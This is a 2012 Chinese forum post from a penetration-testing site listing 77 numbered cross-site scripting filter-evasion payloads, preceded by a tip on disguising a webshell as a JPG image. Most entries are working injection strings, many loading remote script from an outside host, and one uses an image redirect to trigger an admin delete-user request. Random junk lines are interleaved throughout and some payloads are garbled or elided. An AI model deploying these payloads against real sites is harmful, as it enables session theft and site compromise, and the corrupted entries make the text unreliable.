中国网络渗透测试联盟
标题:
xss详细利用大全1
[打印本页]
作者:
admin
时间:
2012-9-13 17:04
标题:
xss详细利用大全1
跨站图片shell
S6 w& d7 {# N4 x9 H+ I. {( @
XSS跨站代码 <script>alert("")</script>
1 ], C7 S3 ^! w
' Y; [7 n, B$ L1 x- k) y' z
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
* R# A" h5 q3 C7 Z' M5 p6 R4 F
" P4 m4 z) V! b, ?) \$ M
, R) e/ n+ Z7 Y
! _$ O Z6 f; {) O
1)普通的XSS JavaScript注入
/ f* `* q. E3 i& K: q# U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ s* K( Q: `% ^ R+ H
' o, S, `+ S, i! X: L" u
(2)IMG标签XSS使用JavaScript命令
$ C2 k: }- S0 N; }/ {! V0 ]* a9 {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 g& `" F9 s5 @+ B3 L7 e# j) `" y
- y$ M" L n+ b- R
(3)IMG标签无分号无引号
, _' ~) Q& f3 h Y3 t1 k
<IMG SRC=javascript:alert(‘XSS’)>
0 o! T4 V5 t3 ~( |2 Y/ n
3 Q3 r& C: u9 j7 f; P* [* ~
(4)IMG标签大小写不敏感
' `' e. z/ S7 p0 \. A
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ X9 M! u8 F8 ~9 ^
. x3 K5 _3 I! p% `
(5)HTML编码(必须有分号)
3 d) d2 i9 M( t$ Z% ]
<IMG SRC=javascript:alert(“XSS”)>
. \4 Y9 v0 \+ } [& o) F
2 B2 `; z w8 p$ P# e* @0 M
(6)修正缺陷IMG标签
0 q1 C f$ U9 \( H9 ]+ X0 Q
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
& {( ^8 [0 R( N; P0 g
8 o0 Q2 Q+ O' ^! G5 C" |
(7)formCharCode标签(计算器)
; x: y. c1 n+ z+ N7 F" Z
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* E$ p2 S* T w3 s+ B- S
7 t( z# r8 r/ @) l
(8)UTF-8的Unicode编码(计算器)
: V7 @/ Y9 f. R: T
<IMG SRC=jav..省略..S')>
6 J& z8 Z' v. e! C, i
* }' x8 V I D# N# ^
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 q( Z6 }, E2 V& \2 i+ s7 x6 B2 y R ?
<IMG SRC=jav..省略..S')>
; W) c4 Y# D' Z" }$ a
; V/ _0 k9 y) e1 a, M0 V0 ]
(10)十六进制编码也是没有分号(计算器)
; Y0 L/ \$ C- }# Z
<IMG SRC=java..省略..XSS')>
5 M" q9 @ n5 Z |
+ o6 Y9 y; ~1 ~3 [* _, D
(11)嵌入式标签,将Javascript分开
7 A4 Y+ Z- ]1 q0 i. t( `
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ ^- C3 ^0 I. N# S
! S+ L; a, I; ]: u1 A
(12)嵌入式编码标签,将Javascript分开
; F, @$ A: P a: T& J0 F
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- K6 B) G# Y4 x& q H
8 D5 A# N$ v+ C. |+ V
(13)嵌入式换行符
M4 V3 N* _1 V/ k, E, K
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 o; Z- P) J) L/ s5 `# j4 h( j
$ @- ?0 ]- I1 I; Z: }
(14)嵌入式回车
# R$ S' q8 A$ B4 ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, ^+ w2 T) P. T; N8 h5 ^" K4 N
5 U3 Y) i0 g+ e' i* i4 I5 u1 o
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
# K9 h0 {1 X9 s/ F
<IMG SRC=”javascript:alert(‘XSS‘)”>
- Q6 L8 b0 i- F. g
( ?8 G4 H. n, N) [; }$ Q
(16)解决限制字符(要求同页面)
/ d4 J% ]- v0 l1 N' `) v
<script>z=’document.’</script>
: f2 J2 C t0 a: z- s4 k9 _$ d
<script>z=z+’write(“‘</script>
7 b# U# }! p X) f( f7 \
<script>z=z+’<script’</script>
; Z- X4 y6 X( H" _9 u+ i
<script>z=z+’ src=ht’</script>
8 B0 `2 l r( g$ |' [
<script>z=z+’tp://ww’</script>
6 L( G) U* _# e
<script>z=z+’w.shell’</script>
0 h/ a' Q- |6 v
<script>z=z+’.net/1.’</script>
4 v6 X6 x8 ]) h, s" |
<script>z=z+’js></sc’</script>
( W n7 f0 b. s3 f0 z: v; f
<script>z=z+’ript>”)’</script>
. @4 }% b! L9 V P# ~" f F+ x
<script>eval_r(z)</script>
1 @) a% U" u$ `4 z6 ]
% Q+ B( u0 ?3 k
(17)空字符
* X4 _) V. Z; _ \
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 A0 [4 k6 P8 O
?, P; {' e$ F F2 B6 Y w3 K
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 |1 r0 ]/ Z( Y* v) M' ?! N/ D7 W
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ E- B3 N1 O$ j5 r7 D" O
& F1 M) E5 _ {. V2 [' G
(19)Spaces和meta前的IMG标签
; J N5 }+ {( {' q F0 k
<IMG SRC=” javascript:alert(‘XSS’);”>
8 p9 q1 z) y$ r D8 U
- b8 [- Y1 b& ^4 q) M
(20)Non-alpha-non-digit XSS
8 V9 i2 D3 X- T$ y) e
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
2 B [$ M. T+ i7 g$ k, b5 u k
5 ]1 ^9 n" ?3 ~- p2 s/ t. S
(21)Non-alpha-non-digit XSS to 2
6 o2 f( f, @; s. N' `) h
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 |. w( S: a. v# R. @
% K% x' m3 j0 }$ e
(22)Non-alpha-non-digit XSS to 3
- f+ C( S+ J& X9 o
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
6 T* f( ?& `) e) F, m
* l8 ]8 B+ a: {# I3 s2 V# f) L0 m/ B
(23)双开括号
4 C4 Y1 _1 O- i u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, \' V0 q5 I! ~5 e. w; G! s9 Y
: D8 n z! ^# C. K
(24)无结束脚本标记(仅火狐等浏览器)
5 x, e& v/ b" t' r2 X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& k4 z, e% ^; ^/ @( {
1 S( `4 N; O, e- A+ d
(25)无结束脚本标记2
6 p9 n/ Z- s% y. D, o& z, ^! O$ l
<SCRIPT SRC=//3w.org/XSS/xss.js>
3 Q$ f8 v( _' H' d, N# K- {7 {
0 h. G+ w+ Q6 f" |5 D; x0 h
(26)半开的HTML/JavaScript XSS
8 F7 |7 h2 v j& E2 t
<IMG SRC=”javascript:alert(‘XSS’)”
( Q6 [7 X( x9 V" b
& r1 P: i. S, g \' ]$ K: ?$ s
(27)双开角括号
8 x2 f7 Y+ t( `+ \. a3 U! g- s9 X
<iframe src=http://3w.org/XSS.html <
5 v6 B' c. Y7 z, r2 x E+ @! c5 g7 v: Y
$ R* R- O3 g. E2 D
(28)无单引号 双引号 分号
/ L) D3 S' E8 V9 _/ i
<SCRIPT>a=/XSS/
( ^9 ^: t6 \, @2 w' D. `
alert(a.source)</SCRIPT>
' v6 M; C7 F: H
0 K% W, g9 ]0 X: U
(29)换码过滤的JavaScript
3 c3 l$ o/ G5 m! T6 \. M) P
\”;alert(‘XSS’);//
9 J4 Z" c) [* I8 R7 o$ k3 p
4 d! A6 C* j% w0 l9 J
(30)结束Title标签
6 x% k1 _+ u4 Z1 B
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( [) P% @! z2 p
4 N5 u! @- P+ O
(31)Input Image
/ e& [+ ^1 j q9 r
<INPUT SRC=”javascript:alert(‘XSS’);”>
5 t0 v' Q' v; ^# o; t7 c, c
! S$ I4 L" @1 ]! m5 r, H% H
(32)BODY Image
) C& K" [4 S' R+ ~2 X) T, H
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 c4 f% h3 s) w* X0 g( g" a
' P* Y& _5 y, D; J: f
(33)BODY标签
+ C8 V+ b3 D' z/ N
<BODY(‘XSS’)>
( R4 E1 ~, e1 @" J9 a$ ]
: P/ j( {$ Y# ]7 R4 G# Y
(34)IMG Dynsrc
" z* F6 C8 e# w$ L6 a: L$ A
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 |" O( q/ N0 @9 |/ Q' b
. M# @9 z; e& { j, d% z) ?
(35)IMG Lowsrc
+ W+ M4 j& p9 }4 n0 x1 q3 ~7 \
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
! }& ^4 ]8 y. l+ [$ d. \5 g& R
4 S' J$ S1 F0 e. [) X/ y. d
(36)BGSOUND
) p5 }6 D# J+ N$ j Z0 G% J' J2 v8 N
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
9 J$ X6 E! H1 S L) ^0 u ^, @
, K5 `" [* ?" h3 z% t; b5 t
(37)STYLE sheet
& V1 a( H/ Z& y9 {
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
F% \' f* @0 `0 N/ y' l
5 x4 g3 o6 g5 g; {
(38)远程样式表
# o; L5 I* N* j; W% g& I, t
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
I$ ?2 b* ?( [" S' p9 S
5 A2 a" ?6 y' `" L. B, `
(39)List-style-image(列表式)
: z- E1 a' I" s' X8 t* }
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% A* |/ M- t. k2 ~5 v( u4 n
; u6 P+ [+ p" D6 [/ `
(40)IMG VBscript
4 x+ \- M' w$ j, Y, l2 ?4 v
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: s O, k' G# F, R1 T4 w4 i, b
0 d. r0 U) @/ F
(41)META链接url
. F: N: \" N/ q( E a
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ i5 C2 U1 x/ K X+ l, b( ~1 |
9 n% z. T& Y1 G% J A, `
(42)Iframe
9 k1 u9 ?* r. [% \' @) A
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" E, f/ S6 B: R0 X/ s" C
(43)Frame
* s- t5 u! i( U4 F. B
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
) A, s8 ~9 ]. v/ ?' @
- s* X& E3 ?- ~
(44)Table
4 E: G2 R/ Z$ b1 p H) a+ Y9 b* p
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
9 K3 J( I* q p D: ?3 C' l- P* n
9 u/ Y* _0 m2 B
(45)TD
: c3 ~7 _$ G: j" R/ A: X
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 g, K1 S/ p# X2 _
9 J6 X& F9 W1 h5 r# z
(46)DIV background-image
- T# r: ?& b0 B8 c- Z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* E: [" X0 \+ r: {7 n% f% [8 [" ~
) s2 ~" X( Q4 E" T) L7 q8 G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
! l; ~) W6 t) w9 Z1 |' E
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
% X" S+ n3 X" c7 @$ J
) J1 Y; Z- U+ u$ m! g) [
(48)DIV expression
! g8 K8 g, D, o0 N' ~: o
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 i' p( ]' g! J# _0 R
' M8 W: E7 p( M7 v3 M0 h
(49)STYLE属性分拆表达
, U; }5 C! u2 k* r! Z- g9 L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! h, \5 V! R: [; ]6 u, s9 A( o
$ E+ N8 l- V" J& C& L
(50)匿名STYLE(组成:开角号和一个字母开头)
( a" F# L e& V
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- E: i+ {- V8 j3 `, [* ?4 Z- ~6 D# O, ~
# G4 r& t5 [2 l3 [, m6 t
(51)STYLE background-image
9 ]( g( p& _6 i8 s3 C/ y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
; g) t) `! w' F( h* x4 J& |
1 F: m- ~6 M( ]0 ^ }8 h7 @% z! [
(52)IMG STYLE方式
4 i }3 h9 a6 c, n5 w
exppression(alert(“XSS”))’>
& L" d/ K7 F/ E" w, g, d7 c& S! o
! ~/ p+ X) C$ Y P$ j
(53)STYLE background
$ M) S) y9 _' v$ Z$ i, C
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# W/ E; ]* x$ J2 ~' }
; x& e2 `7 z2 L: }# B6 h
(54)BASE
2 W6 v: C' S- r {. i* ?
<BASE HREF=”javascript:alert(‘XSS’);//”>
# {: f% p3 ^5 r& Y* x6 q; [
8 ^, d/ S: T: G9 Z5 o# b
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ ?6 W, ~' m+ X) V i! ~
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
2 e+ u {* Z" a6 ^1 R8 Q: K' O8 _
" Y1 m$ P" C) y ?
(56)在flash中使用ActionScrpt可以混进你XSS的代码
9 _6 e1 J$ K: \& ?; y% s
a=”get”;
* u9 G% R$ Z( K5 q3 x
b=”URL(\”";
$ n. ?( X$ P# _2 I0 W- U
c=”javascript:”;
( L' Q5 C c& [" l
d=”alert(‘XSS’);\”)”;
/ T+ h; x& F; G: F* O" q$ P
eval_r(a+b+c+d);
" e% Y: `6 Y" {$ U' @7 _
7 t- \& y5 ~# q1 d
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; l6 K4 v/ f0 h' V
<HTML xmlns:xss>
1 i7 k9 f) h b; X9 d' X( F2 {! J
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
4 j7 I( g0 K% W
<xss:xss>XSS</xss:xss>
+ t' ^" J/ b. j% e
</HTML>
6 H' x% _: O& v! g/ w
: h6 K( V" n9 ]; {, @# l
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" q$ Q+ e; Q; O. B+ F% ]/ Y
<SCRIPT SRC=””></SCRIPT>
6 E. e: M* n" w+ s2 J4 M4 t
* v- }) l: w6 T+ E) D
(59)IMG嵌入式命令,可执行任意命令
) q' Z" a: [( ]8 K8 B5 W% c
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
: z+ M# _+ D0 W$ R1 M, g% X
) R+ l1 y: {' d; L2 l
(60)IMG嵌入式命令(a.jpg在同服务器)
. [& Y/ I0 p/ A+ C& |
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
5 a4 [6 L) m; R9 H/ a# N! Q
/ b" U7 ^# I3 M9 N
(61)绕符号过滤
: q# q y/ k* u" b
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ [! W ~% Y/ c" g& M
9 {; A- v- Y) T/ C$ {
(62)
; o- \1 X) T3 ^( `0 |6 l) J
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
: \9 I7 y& Q2 E# z- Y/ R. T5 T" J
( h$ s: V0 e6 `2 M+ F2 F$ k
(63)
% C& P" o) u# _$ o- E7 v$ D# s; ^
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
- a3 i! @: H* J6 a6 F
; I) `8 s+ ~5 Z0 u, Y; ~5 j& H
(64)
V* L; A4 x$ g' [2 L; V3 ^4 {
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
* O/ U& f g: L
2 ^' l6 a9 G. O, T' U$ A5 ~$ U7 V
(65)
/ w/ N) ^/ e4 A1 Z" q) N, f- r3 O
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ ]* D- g# O7 \! I4 A" V$ [1 h9 i- O
# C; I. |1 X: v4 a o! a, v4 v8 N2 i p
(66)
B! Q* E7 Z; D9 m
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
: i8 W: {9 r* o
2 T: H$ j7 z8 S! L" h
(67)
8 H( @9 i& @% d" a- h2 B" F
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
" ^. ?. y9 M. n
3 o* M* F/ Q8 ^6 o& I: `
(68)URL绕行
$ R% w: }0 x" _3 e" u& Y
<A HREF=”
http://127.0.0.1/
”>XSS</A>
5 z- q3 Z9 u/ p8 [ c
+ @, ~! G; j5 `
(69)URL编码
& ]3 B% v2 [: _- T3 G4 s3 @6 w
<A HREF=”
http://3w.org
”>XSS</A>
6 L& V e& x7 z" D2 h
2 M% E7 a2 z" o) m) |1 s" x! x- @
(70)IP十进制
% F/ h2 i0 W. d% i1 r* v5 [
<A HREF=”http://3232235521″>XSS</A>
# H w2 I% i C/ S* Z
! S+ O8 \$ H5 k
(71)IP十六进制
: B U3 q! X! R; q0 K5 `+ ]
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
Z5 {3 I' Y9 k$ V9 r
; d; V: w3 V& H8 c# ^
(72)IP八进制
9 S4 u- n" G8 h/ x1 t
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
- K2 K' I. l, d3 x
( E: [& |0 ^" z9 y1 {7 u
(73)混合编码
' K' k5 H6 G+ @# G* F
<A HREF=”h
7 c* G1 {2 J s/ j7 u- z
tt p://6 6.000146.0×7.147/”">XSS</A>
5 e# g ^ U: a, O
* {+ k$ N O! i0 G$ k" F
(74)节省[http:]
0 S+ g( m" V9 g1 k0 `# N( P
<A HREF=”//www.google.com/”>XSS</A>
I8 m9 d1 F( q! [, T ^. p
$ P; R3 G# |: j: \4 n
(75)节省[www]
3 R' e) [" v) k. w3 ]2 J) P
<A HREF=”
http://google.com/
”>XSS</A>
% p% C" S8 W4 N2 O! [! m- c
6 h) N9 T8 u1 M7 ?' F }- X! J
(76)绝对点绝对DNS
" ?8 F2 i9 B1 F: c" {
<A HREF=”
http://www.google.com./
”>XSS</A>
. X3 N7 a5 j' ~, g: W- s
3 Y- {( n( W1 @" [) Y- p4 ?( z6 {7 \* \
(77)javascript链接
- E/ @7 H4 P" G( C# H) g8 b
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
% c+ w/ b6 ^' A* t& j. j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2